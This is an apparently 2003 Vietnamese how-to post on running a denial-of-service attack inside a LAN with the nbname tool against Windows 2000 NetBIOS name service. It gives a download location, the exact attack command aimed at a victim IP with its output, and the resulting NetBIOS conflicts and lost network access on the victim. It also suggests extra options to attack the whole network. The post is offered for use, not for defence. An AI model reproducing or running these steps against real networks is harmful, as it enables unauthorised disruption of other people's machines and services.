Tấn Công Dos Trong Lan

Từ trước tới giờ chắc các bạn chỉ nghe đến tấn công DoS trên internet , chứ chưa nghe đến DoS trên LAN đâu nhỉ. Có một tool giúp ta tấn công DoS vào dịch vụ NBNS (Net-BIOS Name Service) trên các máy dùng win2k trong LAN thông qua protocol NetBIOS. Lưu ý : trước khi dùng tool này , bạn phải ngắt service NetBIOS của protcol TCP/IP để tránh xung đột với service NBNS hiện tại ( coi chừng gậy ông đập lưng ông ;-) ). Rồi, bây giờ bạn download nbname tại download.tungxeng.net.ms. Unzip và thử tấn công thằng 192.168.234.222 xem sao (nbname chạy trong DOS): CODE C:\nbname /astat 192.168.234.222 /conflict NBName v1.9 - Decodes and displays NetBIOS Name traffic (UDP 137), with options Copyright 2000: Sir Dystic, Cult of the Dead Cow -:|:- New Hack City Send complaints, ideas and donations to sd@cultdeadcow.com|sd@newhackcity.net WinSock v2.0 (v2.2) WinSock 2.0 WinSock status: Running Bound to port 137 o­n address 192.168.234.244 Broadcast address 192.168.234.255 Netmask: 255.255.255.0 **** NBSTAT QUERY packet sent to 192.168.234.222 Waiting for packets... ** Received 301 bytes from 192.168.234.222:137 via local net at Web Jun 20 15:46:12 200 OPCode: QUERY Flags: Response AuthoratativeAnswer Answer [0]: * <00>Node Status Resource Record: MANDALAY <00> ACTIVE UNIQUE NOTPERM INCONFLICT NOTDEREGED B-NODE MANDALAYFS <00> ACTIVE GROUP NOTPERM NOCONFLICT NOTDEREGED B-NODE **** Name release sent to 192.168.234.222 .... Hậu quả của DoS đối với victim : 1. Kết nối mạng bị trục trặc 2. Làm ngưng các chức năng mạng ( vd chức năng Network Neighborhood) 3. Không dùng được chức năng net send 4. Gặp trục trặc với kết nối domain 5. Không thể truy cập được vào tài nguyên chia sẻ chung 6. Hỏng sevice NetBIOS 7. Dùng lệnh nbtstat -n sẽ gặp 1 bảng thông báo Conflict như sau : CODE LAN: Node IpAddress: [192.168.234.222] Scope Id: [] NetBIOS Local Name Table Name Type Status -------------------------------------------------------------------- MANDALAY <00> UNIQUE Conflict MANDALAYFS <00> GROUP Registered MANDALAYFS <1C> GROUP Registered MANDALAY <20> UNIQUE Conflict MANDALAYFS <1E> GROUP Registered MANDALAY <1D> UNIQUE Conflict .... Bạn có thể tấn công tòan mạng LAN bằng cách thêm các tham số /QUERY , /DENY ... Bạn gõ nbname / ? để tham khảo thêm các tham số kèm theo của nbname. huutung
Chủ Nhật, 23/11/2003 03:07
31 👨 6.212
0 Bình luận
Sắp xếp theo